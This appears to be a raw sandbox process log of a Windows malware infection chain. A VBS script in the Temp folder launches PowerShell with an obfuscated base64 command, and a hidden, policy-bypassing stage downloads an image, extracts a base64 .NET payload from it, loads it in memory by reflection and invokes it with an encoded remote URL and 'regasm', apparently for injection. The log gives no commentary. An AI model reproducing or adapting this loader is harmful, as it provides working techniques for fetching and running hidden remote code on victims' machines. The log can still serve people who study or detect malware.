wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLIEsearchHistory.vbs
2664powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2808powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlcento'))"
2916